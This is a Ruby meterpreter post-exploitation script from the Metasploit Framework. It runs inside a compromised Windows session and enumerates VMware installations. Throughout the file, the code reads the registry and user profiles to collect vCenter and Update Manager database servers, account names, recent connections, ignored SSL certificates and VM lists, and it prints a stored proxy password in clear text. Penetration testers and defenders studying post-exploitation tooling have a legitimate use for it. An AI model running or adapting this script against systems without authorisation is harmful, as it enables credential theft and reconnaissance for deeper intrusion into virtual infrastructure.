GitHub Repository: rapid7/metasploit-framework
Path: blob/master/scripts/meterpreter/enum_vmware.rb
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Script state and option handling ##################
# Keep the session handle in an instance variable so the helper methods
# defined further down can reach it.
@client = client

# "-h" is the only switch; the `false` marks it as taking no argument.
opts = Rex::Parser::Arguments.new("-h" => [false, "Help menu."])

opts.parse(args) do |opt, _idx, _val|
  next unless opt == "-h"

  # Print the usage text, then stop the script through the framework's
  # completion signal.
  print_line("vmware_enum -- Enumerates VMware Configurations for VMware Products")
  print_line("USAGE: run vmware_enum")
  print_line(opts.usage)
  raise Rex::Script::Completed
end
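# Prints and returns the product subkeys found under
# HKLM\SOFTWARE\VMware, Inc.
#
# The vendor key is opened with KEY_READ only; nothing is written to the
# registry. The handle is closed once the subkey list has been read.
#
# @return the list returned by enum_key (one entry per product subkey)
def check_prods()
  key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\VMware, Inc.', KEY_READ)
  begin
    products = key.enum_key
  ensure
    # Release the registry handle even when the enumeration fails.
    key.close
  end
  print_status("The Following Products are installed on this host:")
  products.each { |product| print_status("\t#{product}") }
  products
end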
# Reports whether a "VMware, Inc." subkey exists under HKLM\SOFTWARE.
#
# The SOFTWARE key is opened read-only, its subkey names are listed, and
# the handle is closed after the result has been printed.
#
# @return [Boolean] true when the vendor subkey is present
def check_vmsoft
  software_key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE', KEY_READ)
  vendor_present = software_key.enum_key.include?("VMware, Inc.")
  if vendor_present
    print_status("VMware Products are Installed in Host")
  else
    print_error("No VMware Products where found in this Host.")
  end
  software_key.close
  vendor_present
end
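# Prints the VirtualCenter settings stored under
# HKLM\SOFTWARE\VMware, Inc.\VMware VirtualCenter, plus the database name
# and server of the ODBC data source that the product's DB subkey names.
#
# Only registry reads are performed. The lookup of the stored ODBC user
# name and password is not performed here; only non-credential settings
# are read.
#
# The ODBC.INI lookups are skipped when no data source name is available,
# so a missing DB value no longer aborts the whole listing.
# NOTE(review): assumes registry_getvaldata yields nil for a missing
# value -- confirm against the framework helper.
def enum_vcenter
  print_status("Information about Virtual Center:")
  vc_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter"
  vc_version = registry_getvaldata(vc_key, "InstalledVersion")
  vc_serial = registry_getvaldata(vc_key, "Serial")
  vc_dbinstance = registry_getvaldata(vc_key, "DBInstanceName")
  vc_dbtype = registry_getvaldata(vc_key, "DBServerType")
  vc_tomcatver = registry_getvaldata("#{vc_key}\\Tomcat", "Version")
  vc_type = registry_getvaldata(vc_key, "GroupType")
  vc_odbcname = registry_getvaldata("#{vc_key}\\DB", "1")
  vc_odbctype = registry_getvaldata("#{vc_key}\\DB", "4")

  # The data source name selects the ODBC.INI subkey; strip the trailing
  # newline and tolerate a missing value.
  dsn = vc_odbcname.to_s.chomp
  vc_dbname = nil
  vc_dbserver = nil
  unless dsn.empty?
    vc_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{dsn}", "Database")
    vc_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{dsn}", "Server")
  end

  print_status("\tVersion: #{vc_version}")
  print_status("\tSerial: #{vc_serial}")
  print_status("\tvCenter Type: #{vc_type}")
  print_status("\tTomcat Version: #{vc_tomcatver}")
  print_status("\tDatabase Instance: #{vc_dbinstance}")
  print_status("\tDatabase Type: #{vc_dbtype}")
  print_status("\tDatabase Name: #{vc_dbname}")
  print_status("\tDatabase Server: #{vc_dbserver}")
  print_status("\tODBC Name: #{vc_odbcname}")
  print_status("\tODBC Type: #{vc_odbctype}")
end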
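# Prints one user's VI Client preferences found below +hive_root+
# ("HKCU" or "HKU\\<SID>"): the RecentConnections list and the entries
# under the SSLIgnore key.
#
# Raises when RecentConnections is missing (the value is split without a
# nil check); callers turn that into a "not used" message.
def viclient_print_prefs(hive_root, conn_header, ssl_header)
  print_status(conn_header)
  prefs_key = "#{hive_root}\\Software\\VMware\\VMware Infrastructure Client\\Preferences"
  registry_getvaldata(prefs_key, "RecentConnections").split(",").each do |conn|
    print_status("\t#{conn}")
  end

  # The same path is used for listing the entries and for reading each
  # entry's fingerprint.
  ssl_key_path = "#{hive_root}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore"
  ignored_hosts = registry_enumkeys(ssl_key_path)
  return unless ignored_hosts.length > 0

  print_status(ssl_header)
  ignored_hosts.each do |host|
    fingerprint = registry_getvaldata(ssl_key_path, host)
    print_status("\tHost: #{host} SSL Fingerprint: #{fingerprint}")
  end
end

# Prints the VI Client version and plugins from HKLM, then the per-user
# recent connections and ignored-certificate entries.
#
# When is_system? is false only the current user's hive (HKCU) is read.
# Otherwise every HKU subkey whose name matches the S-1-5-21-... pattern
# is read in turn. All access is read-only.
#
# Changes relative to the earlier revision:
# * the per-user fingerprint lookup uses the "HKU" hive name (it was
#   spelled "HCU", so the lookup could never address the user's hive);
# * a missing preference value in the HKCU branch is reported the same
#   way as in the HKU branch instead of raising;
# * the HKU handle is closed after its subkeys have been listed.
def enum_viclient
  print_status("Information about VMware VI Client:")
  vi_version = nil
  vi_pluggins = nil
  begin
    vi_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\4.0", "InstalledVersion")
    vi_pluggins = registry_enumvals("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\Plugins")
  rescue StandardError
    # Best effort: a failed lookup leaves the fields empty.
  end
  print_status("\tVersion: #{vi_version}")
  if vi_pluggins
    vi_pluggins.each do |plugin|
      if plugin =~ /Converter/
        print_status("\tPlugin: VMware Converter")
      elsif plugin =~ /UM/
        print_status("\tPlugin: VMware Update Manager")
      else
        print_status("\tPlugin: #{plugin}")
      end
    end
  end

  if is_system?
    root_key, base_key = @client.sys.registry.splitkey("HKU\\")
    users_key = @client.sys.registry.open_key(root_key, base_key)
    begin
      # Keep only subkeys that end in a user SID; names with a suffix
      # after the SID do not match because of the trailing anchor.
      user_sids = users_key.enum_key.select { |name| name =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/ }
    ensure
      users_key.close
    end

    user_sids.each do |sid|
      begin
        enumed_user = registry_getvaldata("HKU\\#{sid}\\Volatile Environment", "USERNAME")
        viclient_print_prefs(
          "HKU\\#{sid}",
          "\tRecent VI Client Connections for #{enumed_user}:",
          "\tIgnored SSL Certs for #{enumed_user}:"
        )
      rescue StandardError
        print_status("\tUser appears to have not used the software.")
      end
    end
  else
    begin
      viclient_print_prefs("HKCU", "Recent VI Client Connections:", "\tIgnored SSL Certs for")
    rescue StandardError
      print_status("\tUser appears to have not used the software.")
    end
  end
end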
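# Prints the VMware Update Manager settings stored under
# HKLM\SOFTWARE\VMware, Inc.\VMware Update Manager, plus the database
# name and server of the ODBC data source named in its DB subkey.
#
# Only registry reads are performed. The lookup of the stored ODBC user
# name and password is not performed here.
#
# NOTE: the ProxyPassword value is printed exactly as read, so any
# console or session log that captures this output holds that value and
# should be handled as sensitive.
#
# Failures are reported as a single "Error:" line. Only StandardError is
# caught, so interrupts and process-level exceptions still propagate.
def enum_vum
  print_status("Information about VMware Update Manager:")
  begin
    vum_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager"
    vum_version = registry_getvaldata(vum_key, "InstalledVersion")
    vum_server = registry_getvaldata(vum_key, "VUMServer")
    vum_dbtype = registry_getvaldata(vum_key, "DBServerType")
    vum_useproxy = registry_getvaldata(vum_key, "UseProxy")
    vum_proxyserver = registry_getvaldata(vum_key, "ProxyServer")
    vum_proxyport = registry_getvaldata(vum_key, "ProxyPort")
    vum_proxyuser = registry_getvaldata(vum_key, "ProxyUserName")
    vum_proxypass = registry_getvaldata(vum_key, "ProxyPassword")
    vum_vcentersrv = registry_getvaldata(vum_key, "VCServer")
    vum_vcenterusr = registry_getvaldata(vum_key, "VCUserName")
    vum_patchstore = registry_getvaldata(vum_key, "PatchStore")
    vum_odbcname = registry_getvaldata("#{vum_key}\\DB", "1")
    vum_odbctype = registry_getvaldata("#{vum_key}\\DB", "4")

    # The data source name selects the ODBC.INI subkey; skip the lookups
    # when it is missing instead of failing on nil.
    dsn = vum_odbcname.to_s.chomp
    vum_dbname = nil
    vum_dbserver = nil
    unless dsn.empty?
      vum_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{dsn}", "Database")
      vum_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{dsn}", "Server")
    end

    print_status("\tVersion: #{vum_version}")
    print_status("\tServer: #{vum_server}")
    print_status("\tPatch Store: #{vum_patchstore}")
    print_status("\tDatabse Type: #{vum_dbtype}")
    print_status("\tUses Proxy: #{vum_useproxy}")
    print_status("\tProxy User: #{vum_proxyuser}")
    print_status("\tProxy Password: #{vum_proxypass}")
    print_status("\tVirtual Center: #{vum_vcentersrv}")
    print_status("\tVirtual Center User: #{vum_vcenterusr}")
    print_status("\tProxy Server: #{vum_proxyserver}:#{vum_proxyport}")
    print_status("\tDatabase Name: #{vum_dbname}")
    print_status("\tDatabase Server: #{vum_dbserver}")
    print_status("\tODBC Name: #{vum_odbcname}")
    print_status("\tODBC Type: #{vum_odbctype}")
  rescue StandardError => e
    print_status("Error: #{e.class} #{e}")
  end
end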
# Prints the ProductVersion value stored under
# HKLM\SOFTWARE\VMware, Inc.\VMware VDM (registry read only).
def enum_vdm
  broker_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware VDM"
  print_status("Information about VMware VDM Broker:")
  product_version = registry_getvaldata(broker_key, "ProductVersion")
  print_status("\tVersion: #{product_version}")
end
# Prints the PowerCLI version and install path from
# HKLM\SOFTWARE\VMware, Inc.\VMware vSphere PowerCLI, followed by the
# Windows PowerShell ExecutionPolicy value.
#
# When reading the policy raises, "Restricted" is reported instead.
def enum_powercli
  print_status("Information about PowerCLI:")
  powercli_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI"
  installed_version = registry_getvaldata(powercli_key, "InstalledVersion")
  install_dir = registry_getvaldata(powercli_key, "InstallPath")

  execution_policy =
    begin
      registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\WindowsPowerShell", "ExecutionPolicy")
    rescue StandardError
      # Fallback used when the policy lookup fails.
      "Restricted"
    end

  print_status("\tVersion: #{installed_version}")
  print_status("\tInstalled Pat: #{install_dir}")
  print_status("\tPowershell Execution Policy: #{execution_policy}")
end
# Builds the list of user profiles whose VMware application-data folder
# the file-based routines should look at.
#
# Running as SYSTEM: every entry of the profiles directory is used, except
# the built-in names in the skip pattern. Otherwise only the account named
# by the USERNAME environment variable is returned.
#
# NOTE(review): only OS strings containing "7", "Vista" or "2008" select
# the \users layout; every other value falls through to the
# "Documents and Settings" layout.
#
# @return [Array<Hash>] one hash per user with the keys 'username' and
#   'userappdata'
def enum_users
  config = @client.sys.config
  os_name = config.sysinfo['OS']
  system_drive = config.getenv('SystemDrive')

  profiles_root, vmware_subdir =
    if os_name =~ /7|Vista|2008/
      [system_drive + "\\users\\", "\\AppData\\Local\\VMware\\"]
    else
      [system_drive + "\\Documents and Settings\\", "\\Application Data\\VMware\\"]
    end

  # One record per account: name plus its VMware data folder.
  describe = lambda do |account|
    { 'username' => account, 'userappdata' => profiles_root + account + vmware_subdir }
  end

  return [describe.call(config.getenv('USERNAME'))] unless config.is_system?

  print_status("Running as SYSTEM extracting user list..")
  profiles = []
  @client.fs.dir.foreach(profiles_root) do |entry|
    # Skip directory links and the built-in profile names.
    next if entry =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
    profiles << describe.call(entry)
  end
  profiles
end
# Prints, for every profile returned by enum_users, the entry names found
# in that profile's VIU\hosts\ folder (vSphere Host Update Utility).
#
# A folder that cannot be listed is skipped without a message; the
# per-user header line is still printed.
def enum_vihosupdt
  print_status("Information about VMware vSphere Host Update Utility:")
  enum_users.each do |profile|
    print_status("\tESX/ESXi Hosts added for Updates for user #{profile['username']}:")
    begin
      hosts_dir = profile['userappdata'] + "VIU\\hosts\\"
      @client.fs.dir.foreach(hosts_dir) do |entry|
        # "." and ".." are directory links, not host entries.
        print_status("\t#{entry}") unless entry =~ /^(\.|\.\.)$/
      end
    rescue StandardError
      # Best effort: a missing or unreadable folder is ignored.
    end
  end
end
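# Prints the VMware Workstation favourites of every profile returned by
# enum_users: the configuration-file path and display name of each entry
# in that profile's favorites.vmls file.
#
# Each user's file is read, closed and parsed before the next profile is
# handled, so the entries appear under the matching "VM's for user" line
# and the file handle is always released.
#
# The favourites path is derived by replacing every "Local" in the
# profile's application-data path with "Roaming".
def enum_vmwarewrk
  print_status("Enumerating VMware Workstation VM's:")
  enum_users.each do |u|
    print_status("\tVM's for user #{u['username']}:")
    path = u['userappdata'].gsub(/Local/, "Roaming")
    account_file = @client.fs.file.new(path + "\\favorites.vmls", "rb")
    fav_file = ""
    begin
      fav_file << account_file.read until account_file.eof?
    ensure
      # Release the file handle even when reading fails.
      account_file.close
    end

    fav_file.each_line do |l|
      if l =~ /config/
        print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
      end
      if l =~ /Name/
        print_status("\tVM Name: #{l.scan(/vmlist\d*.DisplayName \= (\".*\")/)}")
        print_status("")
      end
    end
  end
end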
# Entry point. Sessions on any platform other than Windows are rejected
# and the script stops through the framework's completion signal.
unless client.platform == 'windows'
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end

if check_vmsoft
  installed_products = check_prods()

  # Product subkey name => routine to run for it, in this order.
  {
    "VMware VirtualCenter" => :enum_vcenter,
    "VMware Virtual Infrastructure Client" => :enum_viclient,
    "VMware Update Manager" => :enum_vum,
    "VMware VDM" => :enum_vdm,
    "VMware vSphere PowerCLI" => :enum_powercli,
    "VMware vSphere Host Update Utility 4.0" => :enum_vihosupdt,
    "VMware Workstation" => :enum_vmwarewrk
  }.each do |product, routine|
    send(routine) if installed_products.include?(product)
  end
else
  print_status("No VMware Products appear to be installed in this host")
end